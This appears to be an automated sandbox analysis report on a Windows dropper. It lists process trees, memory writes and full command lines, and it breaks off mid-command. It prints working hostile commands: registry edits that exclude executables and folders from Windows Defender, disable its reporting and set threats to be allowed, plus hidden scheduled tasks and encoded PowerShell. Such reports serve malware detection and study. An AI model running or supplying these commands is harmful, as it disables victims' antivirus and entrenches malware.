N/A N/A C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\rznVBFO.exe N/A
N/A N/A C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\rznVBFO.exe N/A
N/A N/A C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\rznVBFO.exe N/A
N/A N/A C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\rznVBFO.exe N/A
N/A N/A C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\rznVBFO.exe N/A
N/A N/A C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\rznVBFO.exe N/A
N/A N/A C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\rznVBFO.exe N/A
N/A N/A C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\rznVBFO.exe N/A
N/A N/A C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\rznVBFO.exe N/A
N/A N/A C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\rznVBFO.exe N/A
N/A N/A C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\rznVBFO.exe N/A
N/A N/A C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\rznVBFO.exe N/A
N/A N/A C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\rznVBFO.exe N/A
N/A N/A C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\rznVBFO.exe N/A
N/A N/A C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\rznVBFO.exe N/A
N/A N/A C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\rznVBFO.exe N/A
N/A N/A C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\rznVBFO.exe N/A
N/A N/A C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\rznVBFO.exe N/A
N/A N/A C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\rznVBFO.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4728 wrote to memory of 2632 N/A C:\Users\Admin\AppData\Local\Temp\PL\setup.exe C:\Users\Admin\AppData\Local\Temp\7zS91C0.tmp\Install.exe
PID 4728 wrote to memory of 2632 N/A C:\Users\Admin\AppData\Local\Temp\PL\setup.exe C:\Users\Admin\AppData\Local\Temp\7zS91C0.tmp\Install.exe
PID 4728 wrote to memory of 2632 N/A C:\Users\Admin\AppData\Local\Temp\PL\setup.exe C:\Users\Admin\AppData\Local\Temp\7zS91C0.tmp\Install.exe
PID 2632 wrote to memory of 1620 N/A C:\Users\Admin\AppData\Local\Temp\7zS91C0.tmp\Install.exe C:\Users\Admin\AppData\Local\Temp\7zS93B4.tmp\Install.exe
PID 2632 wrote to memory of 1620 N/A C:\Users\Admin\AppData\Local\Temp\7zS91C0.tmp\Install.exe C:\Users\Admin\AppData\Local\Temp\7zS93B4.tmp\Install.exe
PID 2632 wrote to memory of 1620 N/A C:\Users\Admin\AppData\Local\Temp\7zS91C0.tmp\Install.exe C:\Users\Admin\AppData\Local\Temp\7zS93B4.tmp\Install.exe
PID 1620 wrote to memory of 2540 N/A C:\Users\Admin\AppData\Local\Temp\7zS93B4.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 1620 wrote to memory of 2540 N/A C:\Users\Admin\AppData\Local\Temp\7zS93B4.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 1620 wrote to memory of 2540 N/A C:\Users\Admin\AppData\Local\Temp\7zS93B4.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 1620 wrote to memory of 896 N/A C:\Users\Admin\AppData\Local\Temp\7zS93B4.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 1620 wrote to memory of 896 N/A C:\Users\Admin\AppData\Local\Temp\7zS93B4.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 1620 wrote to memory of 896 N/A C:\Users\Admin\AppData\Local\Temp\7zS93B4.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 2540 wrote to memory of 2592 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 2540 wrote to memory of 2592 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 2540 wrote to memory of 2592 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 896 wrote to memory of 396 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 896 wrote to memory of 396 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 896 wrote to memory of 396 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 2592 wrote to memory of 4772 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2592 wrote to memory of 4772 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2592 wrote to memory of 4772 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 396 wrote to memory of 2296 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 396 wrote to memory of 2296 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 396 wrote to memory of 2296 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2592 wrote to memory of 2480 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2592 wrote to memory of 2480 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2592 wrote to memory of 2480 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 396 wrote to memory of 184 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 396 wrote to memory of 184 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 396 wrote to memory of 184 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 1620 wrote to memory of 932 N/A C:\Users\Admin\AppData\Local\Temp\7zS93B4.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 1620 wrote to memory of 932 N/A C:\Users\Admin\AppData\Local\Temp\7zS93B4.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 1620 wrote to memory of 932 N/A C:\Users\Admin\AppData\Local\Temp\7zS93B4.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 1620 wrote to memory of 2816 N/A C:\Users\Admin\AppData\Local\Temp\7zS93B4.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 1620 wrote to memory of 2816 N/A C:\Users\Admin\AppData\Local\Temp\7zS93B4.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 1620 wrote to memory of 2816 N/A C:\Users\Admin\AppData\Local\Temp\7zS93B4.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 3172 wrote to memory of 4720 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\system32\gpupdate.exe
PID 3172 wrote to memory of 4720 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\system32\gpupdate.exe
PID 1620 wrote to memory of 2920 N/A C:\Users\Admin\AppData\Local\Temp\7zS93B4.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 1620 wrote to memory of 2920 N/A C:\Users\Admin\AppData\Local\Temp\7zS93B4.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 1620 wrote to memory of 2920 N/A C:\Users\Admin\AppData\Local\Temp\7zS93B4.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 1620 wrote to memory of 4744 N/A C:\Users\Admin\AppData\Local\Temp\7zS93B4.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 1620 wrote to memory of 4744 N/A C:\Users\Admin\AppData\Local\Temp\7zS93B4.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 1620 wrote to memory of 4744 N/A C:\Users\Admin\AppData\Local\Temp\7zS93B4.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 1148 wrote to memory of 2028 N/A C:\Users\Admin\AppData\Local\Temp\alLGALgTRSblXywJD\nzjBlZvpbSzibxG\LkXFgLD.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1148 wrote to memory of 2028 N/A C:\Users\Admin\AppData\Local\Temp\alLGALgTRSblXywJD\nzjBlZvpbSzibxG\LkXFgLD.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1148 wrote to memory of 2028 N/A C:\Users\Admin\AppData\Local\Temp\alLGALgTRSblXywJD\nzjBlZvpbSzibxG\LkXFgLD.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2028 wrote to memory of 4560 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 2028 wrote to memory of 4560 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 2028 wrote to memory of 4560 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 4560 wrote to memory of 3580 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 4560 wrote to memory of 3580 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 4560 wrote to memory of 3580 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2028 wrote to memory of 1852 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2028 wrote to memory of 1852 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2028 wrote to memory of 1852 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2028 wrote to memory of 1944 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2028 wrote to memory of 1944 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2028 wrote to memory of 1944 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2028 wrote to memory of 3820 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2028 wrote to memory of 3820 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2028 wrote to memory of 3820 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2028 wrote to memory of 1136 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2028 wrote to memory of 1136 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe

Processes

C:\Users\Admin\AppData\Local\Temp\PL\setup.exe

"C:\Users\Admin\AppData\Local\Temp\PL\setup.exe"

C:\Users\Admin\AppData\Local\Temp\7zS91C0.tmp\Install.exe

.\Install.exe

C:\Users\Admin\AppData\Local\Temp\7zS93B4.tmp\Install.exe

.\Install.exe /S /site_id "525403"

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"

C:\Windows\SysWOW64\cmd.exe

/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&

C:\Windows\SysWOW64\cmd.exe

/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gcUptHLuv" /SC once /ST 01:00:42 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gcUptHLuv"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\system32\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum

C:\Windows\system32\gpscript.exe

gpscript.exe /RefreshSystemParam

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gcUptHLuv"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "bJbhxhmwQPPePEjnjA" /SC once /ST 08:07:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\alLGALgTRSblXywJD\nzjBlZvpbSzibxG\LkXFgLD.exe\" sw /site_id 525403 /S" /V1 /F

C:\Users\Admin\AppData\Local\Temp\alLGALgTRSblXywJD\nzjBlZvpbSzibxG\LkXFgLD.exe

C:\Users\Admin\AppData\Local\Temp\alLGALgTRSblXywJD\nzjBlZvpbSzibxG\LkXFgLD.exe sw /site_id 525403 /S

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\LsajhStaXkJRC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\LsajhStaXkJRC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\QpigBxJgKxUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\QpigBxJgKxUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YNUWFfCEdUiU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YNUWFfCEdUiU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZRxaODbjXejAAfVsBUR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZRxaODbjXejAAfVsBUR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\oWxSecJNU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\oWxSecJNU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\eiYaNjTCbhfbMeVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\eiYaNjTCbhfbMeVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\alLGALgTRSblXywJD\" /t REG_DWORD /d 0 /reg:32;REG ADD 